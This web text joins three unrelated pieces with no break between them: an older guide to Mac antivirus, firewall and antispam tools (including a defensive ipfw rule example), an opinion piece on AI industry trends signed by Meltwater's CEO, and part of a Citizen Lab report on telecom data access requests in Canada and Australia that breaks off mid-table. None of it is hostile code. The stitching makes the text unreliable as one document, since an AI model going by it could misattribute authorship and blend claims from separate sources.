New malware threats (including the discovery of the first botnet operating on infected Mac OS X machines) are cropping up this year. It’s likely just a sign of things to come as Apple gains market share and visibility.
So Mac users need to understand their options for protecting their systems from malware, network attacks, and other threats.
In this guide, I’ll break down three potential areas of danger – 1) viruses and malware, 2) network attacks, and 3) spam – and detail some of the best tools to combat them.
Let’s start with the classic specter of computer security – the virus or malware. The word virus is almost a misnomer these days. There are still some classic viruses that spread from disk to disk, wreaking havoc and deleting files – many created by kids simply because they could.
In truth, however, the bigger threats today are forms of malware that open covert network connections to servers over the Internet. These servers can then record personal information (user passwords, keystrokes) and take over a machine in the background.
Often these attacks fall into the category of Trojan horses that masquerade as some innocuous application or video codec that gets installed by the average user. The most recent Mac threats started in this form, as components included in real software packages pirated over the Internet.
Being vigilant about what you install and where it comes from is one way to combat this threat. But for the average Mac user who installs a file to view content on a website, the threat still exists.
Another major virus threat is that of macro viruses – most often associated with Microsoft Office. While Macs are typically not as likely to experience severe damage if they open an infected Office document, they are still capable of experiencing some problems – and of passing the virus on to others.
So every Mac should have some form of anti-virus software. Here are the major options:
ClamXav – ClamXav is a simple open source anti-virus tool that is available for free. It is based on the open source Unix ClamAV, but sports a Mac-like graphical interface.
ClamXav works pretty well, though its interface is a little clunky and it is generally slow at performing scans. Its big downside is that it offers fewer automation options than other tools, meaning users must be more proactive about updating virus definitions (the files anti-virus tools use to detect malware) as well as performing scans. It also doesn’t allow you to scan your entire startup drive, meaning you’ll need to manually select folders to scan.
McAfee VirusScan – McAfee has a long history of developing anti-virus tools, and this product was at one time bundled with Apple’s .Mac service (the precursor of MobileMe). McAfee is a decent if not stellar product. It tends to be slower than some of its competition and does show itself to be a product from a largely PC-oriented company.
Norton AntiVirus – Like McAfee, Norton develops security and utility tools for both Windows and the Mac. A while back, Norton’s Mac offerings in both anti-virus and disk utilities were among the best products on the market.
But times change. Norton still produces a compelling product and I’d probably pick it over VirusScan. However, it too suffers from being very obviously a Mac product designed by a predominantly PC-focused company. For businesses that are already invested in other Norton products for managing their PCs, however, it can be an easy addition to an already complete suite (most likely with volume licensing discounts).
Sophos Anti-Virus SBE – Sophos also suffers a bit from being a PC-oriented company, but less than McAfee or Norton do. They produce a simple and lightweight solution for Mac OS X that can be centrally managed very easily.
The downside to Sophos, in my opinion, is less their PC-centric nature than their business-oriented nature and licensing. If you’re a business that has multiple Macs and PCs to protect, Sophos is a great choice (particularly if you’ve got a Windows server – even one in virtualization) to use for central management of both scanning and updating. In fact, for small businesses and/or cross platform businesses that need a simple and effective centralized management option, Sophos is a very good choice.
Intego VirusBarrier – Hands down, the best choice for consumers and for fully Mac-based businesses has to be Intego’s VirusBarrier. The company is entirely Mac-focused and provides a solution that is simple and lightweight, with a very Mac-like feel that makes it a natural choice for many Mac users.
It also offers centralized management (and integration with Intego’s other security tools) for businesses and schools – though if you have a mix of both Macs and PCs to centrally manage, you might want to opt for Norton or Sophos because of their cross-platform management capabilities (and potentially better pricing due to larger volume purchases).
MacScan – MacScan is an anti-spyware rather than an anti-virus tool. The software is designed for detecting spyware processes and applications (keylogging, remote access, and DNS poisoning tools) that may not fall into the typical categories of viruses.
It also focuses on Internet cookies and similar data gathering tools that are not directly classified as malware. The software compares cookies (small bits of data stored by web browsers to keep track of user data when moving from one web page to another) against a blacklist of known malicious web services.
MacScan is a great complement to other anti-virus and security tools and is especially helpful for Macs commonly used by large numbers of individuals (who might place keyloggers and other malicious tools directly on a Mac rather than remotely).
One final tip, regardless of your anti-virus choice: if you’re running Windows on a Mac (either using Boot Camp or virtualization tools like Parallels, VMware Fusion, or VirtualBox), don’t forget that you’ll need anti-virus software on that front too. Norton and Intego both offer Mac/PC protection suites to fill this need in a single product (though in Intego’s case the Windows software is provided through a partnership with BitDefender AntiVirus for Windows).
Firewalls come in all shapes and sizes. Some are physical devices that sit between a computer or network and the Internet while others are software installed on individual machines. Regardless of their form, firewalls are designed to protect your computer from unauthorized access via its network/Internet connection.
While hardware firewalls are great for protecting all the computing devices in your home or office, they don’t offer protection for mobile computers that use a variety of public and private wireless networks. For this, software firewalls installed on those computers are needed – particularly on public networks where any computer connected to the same Wi-Fi hotspot can easily see and potentially access any other.
Mac OS X’s Built-in Firewall – Mac OS X has shipped with a built-in firewall based on the Unix ipfw firewall for several years. Leopard introduced an adaptive firewall interface that is extremely easy for users to configure and work with. It doesn’t offer the option to directly configure complex rules (just the ability to allow or deny incoming connections – though you can modify the list of allowed or blocked applications making those connections fairly easily). Advanced users familiar with Unix will also find ipfw’s full suite of options available from the command line.
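As an illustration, rules of roughly this shape could be added from the command line (a hypothetical sketch — check the exact rule syntax against the ipfw man page for your OS version, and note the commands require root):

```
# Allow incoming web traffic, then deny all other incoming TCP connections
sudo ipfw add 1000 allow tcp from any to me dst-port 80 in
sudo ipfw add 1100 deny tcp from any to me in
```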
While Apple did a good job crafting a very easy-to-use and generally decent firewall, its limitations do show, particularly if you need a firewall for any professional situation. At the very least, however, every Mac user should be using it.
Intego’s NetBarrier – Intego again gets my props for its NetBarrier firewall. NetBarrier is designed to be easy to use (like Leopard’s built-in firewall), but also offers easy configuration of more complex rules from a Mac-like GUI. It also offers a number of pre-configured settings applicable to both home and education/business environments, including rules to block specific types of applications (such as peer-to-peer file sharing) and specific types of known threats (such as those posed by spyware).
In addition to being highly configurable and yet very easy to use, NetBarrier is a powerful tool for protecting a Mac. It offers a number of extra features beyond basic filtering of incoming and outgoing connections, including the ability to define specific sets of rules for different locations (home, office, public Wi-Fi, etc.), and it shows you how much bandwidth is being used for various types of network access (web, email, iTunes file sharing, etc.).
Norton Internet Security Suite – Norton Internet Security is Symantec’s firewall product for both the Mac and Windows. The suite offers a solid solution and integrates with Symantec’s Deepsight blacklist, a global list of Internet addresses associated with various forms of network attack and malware distribution. Like NetBarrier, it also allows you to define different settings based on location.
Like NetBarrier, Norton Internet Security strives to offer powerful firewall rules and protection options in a simple manner that all users can comprehend and manage. The interface isn’t quite as intuitive in my opinion, and it lacks some of the extra features that Intego built into NetBarrier. That said, it is still a powerful solution and offers a few features of its own, including a file guard technology for securing access to files on your hard drive.
DoorStop X – From Open Door Networks, DoorStop X is a firewall that offers a more stripped-down interface than either NetBarrier or Norton Internet Security. Instead of focusing on consumer-friendly interface elements and extra features, DoorStop X focuses on simply being a good firewall. It allows a decent set of rules and enables you to easily configure protection for common Mac services (such as web access and file sharing).
The downside is that DoorStop X is not as easy as NetBarrier or Norton for novice computer users to configure. For consumers looking for a very simple solution, this probably makes it a less desirable choice. For power users and technicians wanting something that allows easy configuration of the core features of a firewall without a lot of bells and whistles, this can actually make DoorStop X somewhat more appealing.
IPNetSentryX – IPNetSentryX is a fourth firewall option for Mac OS X. It is a robust tool that operates slightly differently from a traditional firewall. Typically, firewalls rely on a fixed set of rules to allow or deny connections (the default rule being to deny everything). IPNetSentryX does offer this, but it’s designed to run in an adaptive fashion, monitoring your network/Internet traffic but not blocking connections unless there is some suspicious activity (either defined by its default settings or by your custom rules).
Although its approach makes for a lightweight and adaptive product (and one which can be used for anything from simple protection to complex bandwidth management), IPNetSentryX’s interface is probably the least user friendly of the firewalls available for Mac OS X. This can be off-putting to many users. However, if you’re a power user or technician and want to leverage a number of complex firewall options, it’s worth checking out.
Who’s There? – A companion product to DoorStop X, Who’s There? isn’t a firewall itself, but rather an application that reads firewall logs and provides information and advice about the entries it finds. This can help you fine-tune your firewall settings and better understand how your firewall is protecting (or not protecting) your Mac.
Little Snitch – Like Who’s There?, Little Snitch isn’t a firewall but a useful companion to one. But while Who’s There? and your firewall logs can often inform you easily about incoming connections to your Mac, Little Snitch is focused on the opposite – telling you what applications and services (such as file sharing or iTunes Music Sharing) your Mac is attempting to connect with on network resources or the Internet.
Since some malicious tools (or even legitimate software) installed on your Mac are typically allowed to make outgoing connections through a firewall, being aware of exactly what the software on your Mac is trying to do and who it’s trying to contact can be a great security aid.
Armed with the information that Little Snitch provides, you can craft better firewall rules if needed. You can also use it to turn off unused services (such as file sharing, screen sharing, or even iTunes) that could make your Mac more vulnerable to attack. It even provides a way of simply being aware of how people using your Mac are accessing the Internet. All of these make Little Snitch a great Mac security aid.
Most people tend to think of spam as an annoyance that clogs up their inbox and keeps them from getting to really important emails – and that’s certainly true. But spam isn’t just a productivity killer, it can pose a real security threat. Junk emails often load web content that has the potential to impact your computer whether or not you click on a web site referenced in the message.
And often clicking a link in a message will deliver you to some form of malicious website designed to either install malware or use a phishing scheme intended to mine personal information.
The fight against spam can and should take place on multiple levels. Ideally, your mail server will have its own junk mail filtering. Public services like Apple’s MobileMe, Gmail, Yahoo Mail, and Hotmail offer some of the best spam filtering because they handle mail accounts for so many people. But private servers (those run by an Internet provider or private company) may not have such extensive or fine-tuned spam filtering.
Beyond the server level, filtering can take place on your computer. Almost all email applications, including Apple’s Mail and Microsoft’s Entourage (the two most common Mac email clients) include some junk mail filtering options. But you can extend those capabilities with additional anti-spam software, including the following:
SpamSweep – SpamSweep is an application that acts as a middleman between your email client and your mail server. SpamSweep connects to your mail server, downloads the first 100K of each message, scans them, and then deletes the spam while it’s still on the server (you can control confirmation of what is and isn’t spam). When your mail application connects, it downloads the remaining (good) messages.
SpamSweep uses a combination of blacklist (bad) and whitelist (good) email senders as well as a technique called Bayesian filtering, which analyzes the content of each message to determine how to mark messages. These filters and lists can be trained by marking mail as spam (or not spam) and grow more accurate over time as you use the software.
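As a rough illustration of the Bayesian idea (a toy sketch with made-up word probabilities — not how any of these products actually implement it), per-word spam likelihoods can be combined into a single score:

```python
import math

# Hypothetical per-word spam probabilities, as might be learned from training.
WORD_SPAM_PROB = {"winner": 0.95, "free": 0.90, "meeting": 0.05, "report": 0.10}

def spam_score(message, prior=0.5):
    """Combine word evidence in log-odds form (naive Bayes style)."""
    log_odds = math.log(prior / (1 - prior))
    for word in message.lower().split():
        p = WORD_SPAM_PROB.get(word)
        if p is not None:
            log_odds += math.log(p / (1 - p))
    # Map the accumulated log-odds back to a probability of spam.
    return 1 / (1 + math.exp(-log_odds))
```

Training then amounts to updating the per-word probabilities as the user marks messages, which is why accuracy improves with use.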
Overall, SpamSweep is pretty good at making the right choices, and you can define some overrides to its basic behavior. On the downside, it runs as a separate program rather than being integrated into your email client, and it’s a little disconcerting to have a separate program deleting messages for you. Also, it doesn’t provide any real custom rule-making options other than training its filters over time.
SpamSieve – SpamSieve may be the best of the anti-spam additions for Mac OS X. While it uses the same filtering techniques as SpamSweep, it does so by integrating with your email client and Mac OS X’s Address Book. It supports a wide range of clients, including the most common Mail, Entourage, Eudora and Thunderbird.
So you don’t need to launch a separate application to confirm the software’s spam/not spam decisions. It also means your email is still managed by your email application. The support for Address Book (and contacts in Entourage) is a nice way of ensuring anyone you actually know will be able to reach you.
SpamSieve does offer its own separate application as well. This is used to configure filters (and quite a bit of configuration is supported) and the training process. It also allows you to configure mail notifications and other points of integration with your email client. Perhaps most importantly, SpamSieve does an impressive job of accurately filtering spam.
Intego Antispam – Intego’s offering in the antispam category, appropriately named Personal Antispam, is another good choice. It integrates with either Mail or Entourage and can integrate with Address Book for trusting contacts. Although this is a more limited set of email clients than other tools, it does cover most Mac users.
As with their other tools, Intego has put an effort into making Antispam very user friendly. Beyond being user-friendly, it offers the ability to customize filtering and provides filtering options beyond the blacklist/whitelist and Bayesian techniques found in other tools. You can also filter based on types of attachments or portions of website addresses mentioned in an email. A particularly nice feature is that not only can you configure each type of filter, you can also opt to use all or only some of them.
Personal Antispam enables you to export spam rules as files for installation directly on other Macs running the software. It also offers usage reports and graphs, helping you see the percentage of spam being filtered as well as the types. Overall, this is another great product from Intego.
Mac Security Software: More Information
While keeping your Mac secure is about finding the right mix of tools for your needs (and your level of comfort with technology), equally important is keeping those tools updated and understanding how to use them effectively. Whichever tools you choose, be sure to read and understand the documentation.
And remember, security doesn’t stop with the introductory guide. The following websites provide additional information and tips for Mac security:
Mac Security Guide from Home PC Firewall Guide.
Artificial intelligence is a topic that’s been discussed for decades, but it’s an industry still very much in its infancy - we’re only seeing the beginning of its capabilities. There are areas where AI has become heavily relied upon - such as algorithmic trading - but, in general, the broad adoption of the technology is still marginal. As an industry, it’s a toddler you could say, but we’re at a point in time where we can expect to see it grow up - and fast.
There have been notable achievements and breakthroughs throughout the years which we can look at to get a better understanding of where AI is at today. First came expert systems, adopted in the 70s and 80s for use in our cars, PCs, and other forms of manufacturing, but which failed dramatically when applied to fields such as healthcare, and so hit a barrier to exponential adoption.
Google’s search engine and Amazon’s recommendation system were the masterpieces of the next AI wave in the 90s which introduced today’s ‘pattern recognition’ boom. This is all about AI learning to recognise features and patterns in complex data even where humans fail to identify them. The biggest success stories here are in:
- Natural language processing, from speech recognition and machine translation, to automated text summarisation and question answering.
- Image, video, and other signal processing for detecting complex patterns, such as activity trackers learning to detect different types of activity from motion signals.
An important milestone was the highly publicised machine over man triumph in 1997 when IBM’s Deep Blue chess computer won over the reigning world chess champion Garry Kasparov. This was symbolically significant because it was one of the first demonstrable examples of a machine outperforming a world leader in its field. The Deep Blue victory established an understanding that AI could be used to solve very complex problems. If it could beat the best chess player in the world, what could it do next?
Since then, AI has found its way further into online user experiences and the optimisation of online ads, but hasn’t been adopted as fast as many may have predicted 20 years ago. However, recent advances in deep learning, exemplified by Google's AlphaGo surprise win over the world’s elite Go players in 2016, signal that a new generation of AI algorithms is making its way into the market. This suggests that the next 20 years will see an acceleration of the importance of AI in almost every industry.
We’re now seeing three pillars of AI markets which are all developing in different ways, with various companies operating within them.
- The ‘AI as infrastructure’ market where companies directly sell AI services or platforms.
- The ‘AI as a vertical’ market where highly-skilled teams apply AI to a specific vertical, directly competing with established players, e.g. in finance, life science, energy etc.
- The ‘AI as a growth driver’ market. Here, AI technologies are applied - often in a very bespoke way - to specific problems in a wider industry, e.g. object recognition for detecting hurdles in a traffic lane.
If we look at the forecast of AI across the next five years, the biggest trend impacting the corporate world is the importance of external data and how AI will be used to incorporate this into more proactive decision making processes. External data is one of the biggest blind spots in corporate decision making today, with many executives making decisions primarily based upon internal insights. This is a very reactive approach because internal data is a lagging performance indicator. It is looking at the result of historic events that took place in the past - weeks, months, quarters, sometimes years in the past.
In external data, however, you can find many forward-looking insights about your entire competitive landscape. By monitoring job postings you can track - in real-time - the appetite for investments among competitors, partners, distributors, and suppliers. You can also harness insights into how competitors spend their online marketing dollars; do they increase their spend in Europe or are they doubling down in North America? By mining social media, you can pick up on changing trends in consumer preferences informing investment decisions in existing or new product lines. By analysing external data, executives can find forward-looking insights and indicators to help them stay on top of changes in their competitive landscape and to be proactive in their decision making. We call this approach OI (Outside Insight) and over time we believe the need to analyse external data will grow into an entirely new software category analogous to what BI (Business Intelligence) is to internal data.
In saying this, the ultimate potential market for AI is very large and will extend far beyond its current scope. The industries AI is having an impact on will continue to expand with transportation, food and drink, healthcare, finance and risk assessment likely to be the most transformed by new approaches. We’ll also continue to see even more successful targeting outside of Adtech; specifically moving into politics (Cambridge Analytica, Palantir), journalism (Buzzfeed, targeted content farming) and healthcare.
Three key factors driving AI going forward are:
- Exponential growth of cloud-based computing power (per dollar)
- Further advancements in AI techniques such as deep learning
- Continued growth of available data (internal company data, external online data, data generated by IoT)
Combined, these three factors will make AI stronger, more reliable, and more relevant for an increasing number of decision makers across functions in any industry. As such, AI will play a meaningful role in total corporate IT spend within the next decade. It’s reasonable to expect it to grow into the hundreds of billions of dollars, if not more.
Although the development of AI is at an exciting stage, there are still challenges related to the experience and skill required to design new systems. There will be big changes in the near future, but the best is yet to come.
Jorn Lyseggen, Founder & CEO, Meltwater
Image Credit: John Williams RUS / Shutterstock
How do the companies that provide the services we use to connect online and communicate handle our personal data?
What types of data do they collect?
How long do they retain it for?
Do they share it with any third parties?
Without knowing who is collecting personal data, for what purpose, or for how long, or the grounds under which they share it, a consumer cannot exercise their rights nor evaluate whether a company is appropriately handling their data.
As of 2019, 134 countries around the world have enacted data protection laws. A primary right under many data protection regimes is data access requests (DARs), which are written queries that an individual sends to a private company whose products or services the individual uses. DARs ask that company to disclose all of the data and information that the company holds on that individual, including when, how, to whom, and for what reasons a company shares or discloses the individual’s data, and other details about the company’s data protection practices and compliance with applicable privacy laws. Although the right to make DARs is part of many data protection laws in theory, there is limited empirical documentation of how companies respond to these requests in practice.
In 2014, the Citizen Lab and Open Effect started Access My Info (AMI), a research project that uses data access requests and complementary policy, legal, and technical methods to learn how private companies collect, retain, process, and disclose individuals’ personal data. Accompanying the research methodology is a web-based tool that helps members of the public generate data access requests based on templates tailored to different industries.
AMI was first applied in Canada, resulting in tens of thousands of Canadians making DARs to telecommunication companies. The results of the study showed inconsistent responses across companies and documented consumers experiencing significant barriers to accessing their data.
Following the first AMI project in Canada, the Citizen Lab formed a working group to bring the research method to Asia and comparatively measure responses to DARs across the region. The working group includes academics, lawyers, advocates, and designers working in five jurisdictions:
🇰🇷South Korea: Kelly Kim (OpenNet Korea), KS Park (Korea University)
🇦🇺Australia: Adam Molnar (University of Waterloo / Deakin University)
🇮🇩Indonesia: Sinta Dewi Rosadi (University of Padjadjaran)
🇲🇾Malaysia: Sonny Zulhuda (International Islamic University Malaysia)
Each partner sent data access requests to telecommunication companies and Internet Service Providers (ISPs) in their respective jurisdictions to better understand the type of data these companies collect on their customers, how long this data is retained for, and if it is shared with third-parties. Partners also sought to learn the methods by which these companies responded to requests: how long requests took to be fulfilled and the amount of work required on the part of the requester, as well as if and how fees for access are obtained.
While each jurisdiction has unique laws and context we found general patterns across them.
Data Protection in Asia is a dynamic legal space: Asia is a particularly interesting region to conduct this study because it includes countries with strong personal data access laws and those with none or that are in the process of establishing data protection legislation. A commonality across all jurisdictions is that elements of data protection are in flux or subjects of debate.
While South Korea has the strongest data protection laws in the region, the AMI project found superficial compliance with DARs from telecommunication companies. All companies had online data request procedures, but the majority of companies only provided copies of their privacy policies in response to the data access requests. In response, AMI partner Open Net Korea filed a lawsuit against Korea Telecom for not providing a complete response to DARs.
In Hong Kong and Australia defining what is personal data has raised debate. In Hong Kong telecommunication companies and ISPs argue that Internet Protocol (IP) addresses and geolocation records are not personal data and therefore they are not required to give user access to this data. In Australia IP addresses are currently not included in the legal definition of personal information.
Other jurisdictions with emerging or non-existent data protection laws faced other challenges. Malaysia has established a data protection law, but it is not robustly enforced; Indonesia has a draft data protection bill but has not yet passed it into legislation. As a result in both jurisdictions DARs resulted in limited responses from companies.
Responses from telecoms across jurisdictions have been inconsistent with what was requested and in some cases what is required by law: Overall, we found that responses from telecoms were incomplete and in some cases did not follow what is required by law. Generally, across the different jurisdictions we find that telecoms have yet to develop a mature process to fulsomely handle requests for personal data. These results show the importance of measuring how laws function in practice, rather than only reviewing what they mandate on paper.
This report provides results from each Asian jurisdiction as a series of case studies. We also include a summary of results from Canada (the first jurisdiction AMI was applied in) for comparative purposes.
Christopher Parsons (Citizen Lab, University of Toronto)
- Barriers to Access: All telecommunications companies charged participants a fee for access to detailed SMS or call records.
- Variation in Responses: Previous research showed that telecommunications companies generally did not clearly tell participants if their data had been shared with third parties such as government agencies. In 2016, the majority of these companies provided clear responses to the question of third party data sharing.
Canadian telecommunications companies’ collection and use of personal data is regulated by a federal law, the Personal Information Protection and Electronic Documents Act (PIPEDA). The law is centred around ten fair information principles:
- Accountability
- Identifying Purposes
- Consent
- Limiting Collection
- Limiting Use, Disclosure, and Retention
- Accuracy
- Safeguards
- Openness
- Individual Access
- Challenging Compliance
Organizations that collect personal data must have an employee responsible for compliance with PIPEDA. Such employees must identify the purposes for which information is collected, prior to collection, and any collection may only take place with the knowledge and informed consent of the data subject. Data collection should be minimized to what is needed to accomplish a specific task. Data should only be used or disclosed for the purposes for which it was collected, and should cease being retained once it is no longer needed. Data must be accurate and up-to-date, and protected by strong policy and technical safeguards. Companies must publicize documents describing their privacy practices and provide data to consumers upon request. Finally, consumers can challenge companies they believe have insufficiently complied with the law.
Table 1 provides an overview of how the principle of access to consumer data functions in the Canadian context:
|Legal justification||Principle 4.9 of the Personal Information Protection and Electronic Documents Act (2000)|
|Phrasing||“Upon request, an individual shall be informed of the existence, use, and disclosure of his or her personal information and shall be given access to that information”|
|Response deadline||30 days, with a 30 day extension possible|
|Fee for access||“At minimal or no cost to the individual”|
|Remedies if unsatisfied with response?||An individual may file with the Office of the Privacy Commissioner of Canada a written complaint against an organization|
Table 1: Overview of Canadian law about data access requests
The Canadian telecommunications market is composed of several large incumbent companies as well as many much smaller competitive companies. Few to no international companies offer competing services in Canada. Among wireless providers, the concentration is even more stark: the incumbents are the largest companies offering mobile service and include Bell Canada, Rogers Communications, and Telus. Each of these companies operates subsidiary brands that use its infrastructure.
The Canadian telecommunications service provider industry has a history of granting government agencies access to subscriber information for criminal investigations or other security reasons without first requiring a warrant or judicial order compelling the provision of such information. This practice stopped following a Supreme Court of Canada decision in 2014. Furthermore, due in part to pressure from Canadian privacy advocates and academics in the form of open letters, parliamentary questions, and a data access request campaign, some Canadian telecommunications service providers now release transparency reports that provide some statistical reporting on the frequency with which government agencies request, and receive, information pertaining to companies’ subscribers and customers.
Access My Info: Canada
In 2016, the AMI Canada team recruited five participants who individually sent data access requests (DARs) to five different telecoms: Bell, Fido, Rogers, Shaw, and Wind. Under PIPEDA, such requests legally compel companies to respond. We analyzed only one request per company.
All Canadian telecommunications companies who were issued DARs responded to requests for access to personal data within the mandated 30 day period.
Table 2 lists the companies that DARs were sent to, the date that the DAR was issued, and the date of the first response from the company.
|Company||Request Date||First Response Date|
Table 2: 2016 DAR Issuance and Response Dates
Most companies responded to the question of whether data had been shared with law enforcement; in the case of the participants’ DARs, all of the companies indicated that data had not been shared with law enforcement or other third parties. These direct responses stand in contrast to the results of DARs asking the same question in 2014, when no company provided a clear or direct response.
All companies responded with some form of cover letter that acknowledged the receipt of the request and, typically, also provided some general responses to the questions in the DAR. DARs issued by participants also asked for access to technical data that was associated with the requester, such as IP address logs or geolocation information. Companies were unwilling to provide this data free of charge, and there was significant variation in how much money was required before technical data would be disclosed. In most cases the proposed fees were in the hundreds of dollars.
These costs served as a significant barrier to access: our research participants did not pay the fees and therefore could not obtain full access to their data. We hypothesize that fees and additional procedural steps act as barriers to persons accessing their own personal information.
|Company||Fee requested? For what?||Tell requester if data shared with law enforcement?||Notes|
|Bell Canada||Will provide a cost estimate for historical assigned IP addresses upon request||Said it must check with authorities first and asked the requester to inform Bell whether they want the company to do so||Generally responded to most questions asked but failed to provide data retention period information.|
|Rogers Communications / Fido Solutions||Detailed SMS and call metadata including cell tower info ($100/month); Call logs beyond 18 months old ($15/month)||Yes||Generally responded to most questions. Stated the companies retain call log/SMS metadata (cell tower assignments) for 13 months. Asserted that the companies do not collect geolocation data. Provided IP address retention periods (7 days mobile; 13 month home Internet).|
|Shaw Communications||Historical assigned IP addresses ($250 per year per modem)||Yes||Generally responded to most questions. Did not provide data retention periods. Asserted the company does not collect location data as they do not provide mobile services at the time research was conducted.|
|Wind Mobile (now Freedom Mobile)||Stated metadata could be retained but did not mention that the customer could get access to retained information; the participant did not follow up with additional requests for clarity.||Yes||Generally responded to most questions. Indicated customers can get access to retained call logs for 90 days but did not specify the company’s own retention period. Provided detailed scenarios in which geolocation data may be collected, such as an e911 event, and stated that such data was not collected for the requester.|
Table 3: Summary Analysis of DAR Responses from Telecommunications Service Provider Data in Canada, 2016
DARs can be a valuable method for understanding the kinds of information which are collected, retained, processed, and handled by private companies. However, our study found that Canadian Telecommunications Service Providers’ processes surrounding DAR-handling and -processing were immature. Advancing DAR practices and policies requires either private-sector coordination to advance individuals’ access to their personal information or regulatory coordination to clarify how private organizations ought to provide access to the information of which they are stewards.
Below are three recommendations from our full report of steps companies can take before, during, and after requests to improve the process by which citizens can obtain access.
- Companies should review their access processes and assess where improvements could be made to reduce costs, simplify or make more user-friendly their identity verification steps, and streamline security procedures.
- Companies should publish data inventories describing all the kinds of personal information that they collect and freely provide copies of a small set of representative examples of records for each kind of personal information to subscribers upon request.
- Companies should collaborate within their respective industries to establish common definitions for personal data to which common policies are applied, such as subscriber data, metadata, and content of communications, amongst others.
Andrew Hilts, Christopher Parsons, and Masashi Crete-Nishihata, 2018, “Approaching Access: A look at consumer personal data requests in Canada,” Citizen Lab, University of Toronto.
Adam Molnar (University of Waterloo)
- Barriers to Access: Many telecommunication companies failed to comply with requests, for reasons unknown.
- Variation in Responses: For those that did reply, responses were uneven in the scope of information disclosed, the guidance offered, and pricing.
In Australia, the relevant statutory authority for privacy and data access rights is the Privacy Act 1988 (Privacy Act). In 2014, the mandatory cornerstones of the Privacy Act were summarized in a policy guidance document known as the ‘Australian Privacy Principles’ (APPs).
Two items are particularly relevant regarding subscriber access to telecommunications information under the APPs. The first, s.6(1) of the Privacy Act, is the legal definition of ‘personal information.’ Personal information is defined in the Act as “any information or an opinion about an identified individual, or an individual who is reasonably identifiable.” Common examples of personal information under the Act include an individual’s name, signature, address, phone number, date of birth, bank account details, and so on. The term “about” is particularly salient in the context of data access requests because it can cover personal information broader than the identifying examples listed above. For example, information “about” an individual might include a vocational reference, an assessment of an individual’s career, or personal views expressed by an author. Together, the identifiability and “about” requirements delimit the scope of information that constitutes personal information. In a notable case before the Administrative Appeals Tribunal (Grubb v Telstra), IP addresses were excluded from the definition of personal information because they were held to be about Telstra’s business practices rather than about Mr. Grubb. This position was upheld by the Federal Court on appeal by the Australian Privacy Commissioner. While IP addresses are currently not included in the legal definition of personal information in Australia, some legal commentators insist that the issue remains unresolved, given the narrow terms of the appeal that the Privacy Commissioner pursued in the Federal Court.
The second relevant item under the APPs refers to access and correction of personal information (APP 12 and 13). Entities that fall under the Privacy Act (“any entity that has an annual turnover of over $3,000,000”) are obligated to provide access to personal information that they hold upon request by an individual. The table below elaborates on the key items associated with access provisions under the Privacy Act and APP 12; combined, these items make explicit that persons living in Australia have the right to make Data Access Requests (DARs) to private organizations.
|Legal justification||APP 12.1 – Access|
|Phrasing||“If an APP entity holds personal information about an individual, the entity must, on request by the individual, give the individual access to the information.”|
|Response deadline||The APP entity must respond within a reasonable period after the request is made. Accompanying APP Guidelines state that, “as a general guide, a reasonable period should not exceed 30 calendar days.”|
|Fee for access||If the APP entity is an organisation, and the entity charges the individual for giving access to the personal information, the “charge must not be excessive and must not apply to the making of the request.”|
|Remedies if unsatisfied with response?||APP 12.9 (Refusal to give access): “If the APP entity refuses to give access to the personal information because of sub clause 12.2 or 12.3, or to give access in the manner requested by the individual, the entity must give the individual a written notice that sets out: […]” APP 12.10: If the APP entity refuses to give access to the personal information because of paragraph 12.3(j), the reasons for the refusal may include an explanation for the commercially sensitive decision. Under s.28(1) of the Privacy Act, the Information Commissioner has powers to investigate possible interferences with privacy, either following a complaint or on the Commissioner’s own initiative.|
The Australian Telecommunications Service Provider (TSP) and Internet Service Provider (ISP) market is best understood as a ‘mixed’ market of network providers (wholesalers) and service providers (resellers). There are public agencies that both own infrastructure and provide service (e.g., the National Broadband Network), private entities that both own infrastructure and provide services (e.g., Telstra, Vodafone, and Optus) and, lastly, private entities that exist solely as service providers with ‘leased’ access to the infrastructure (e.g., Jeenee and Amaysim). The Australian market raises considerations with regard to eligibility under the APPs and comparisons within and across network owners versus service providers. For instance, smaller companies such as Amaysim run on Optus’ network yet exist solely as service providers. As a result, their particular link into telecommunications infrastructure means they have access to different types of data, which influences the scope and type of data that can be disclosed under both subscriber and law enforcement requests.
Access My Info: Australia
Nine volunteers submitted written data requests by mail between December 2015 and February 2016. One volunteer made a request to Telstra, three volunteers sent requests to Optus, one volunteer to iiNet, and one volunteer made two different requests to Vodafone. One volunteer also made a request to TPG, two volunteers each made a request to Amaysim, and one volunteer made a request to Jeenee. The table below provides a detailed itemisation of the timeline associated with requests issued to each company and the companies’ response dates.
|Company||Request Date||First Response Date|
|Telstra||Dec 12 2015 (online portal)||Jan 25 2016, with invoice for retrieval (paid); data provided March 2 2016|
|Optus||Dec 12 2015 (First Request)||None; Feb 25 2016 phone call made – no trace of request|
|Optus||March 15 2016 (Second Request)||None|
|Optus||Feb 2 2016 (Third Request)||Mar 3 2016 – contacted subscriber by phone and told the customer a subpoena would be needed to access the data; subscriber requested this information via email, which was sent that day. Mar 16 2016 – subscriber replied to the email asking why the information could not be released under the APPs and received no reply.|
|iiNet||Dec 12 2015||No reply|
|Vodafone||Dec 12 2015 (First Request); Feb 9 2016 (Second Request)||Mar 3 2016 – reply noting receipt of both requests, with an attached letter detailing retrieval costs and a non-disclosure agreement|
|TPG||Dec 12 2015||Mar 7 2016 reply seeking clarification on request. Volunteer didn’t follow up.|
|Amaysim||Dec 12 2015 (First Request); Dec 12 2015 (Second Request)||Feb 24 2016 – replied with data (both requests)|
|Jeenee||Mar 15 2016||No response|
The study indicates that a number of Australian telecommunications entities struggle to adhere to their lawful requirements under the Privacy Act and APPs. Numerous requests went unheeded and, among the companies that did respond, internal procedures appeared to be lacking. Without such procedures, improper advice was offered by company staff, which in itself established additional barriers to requesters accessing their personal information. Companies that repeatedly did not respond are not included in the table below (the exception being Optus, which did not respond on two occasions but did so on a third). Among companies that did respond, fees varied. Telstra and Vodafone (both infrastructure operators) charged significant fees amounting to hundreds of dollars. Optus did not respond with any customer data, while Amaysim (an infrastructure ‘reseller’) charged no fees at all when providing data. The table below elaborates on notable aspects of the results. Vodafone issued a letter stating that the requester’s sharing of any personal information disclosed would violate the standard form contract agreed between the company and its customer.
|Company||Fee requested? For what?||Tell requester if data shared with law enforcement?||Notes|
|Telstra||Online portal was used to request information at varying prices; the total fee in this study was AUD 225 for the most comprehensive information available (see Appendix 1 below).||Yes||Information was disclosed via an encrypted zip file (password sent in plain text in a separate email).|
|Optus||No fee requested; advised that a subpoena be obtained to facilitate the request||Yes||Generally responded to most questions in conversation. No information provided apart from improper advice citing a subpoena requirement, and then no response when asked to clarify whether this advice was correct.|
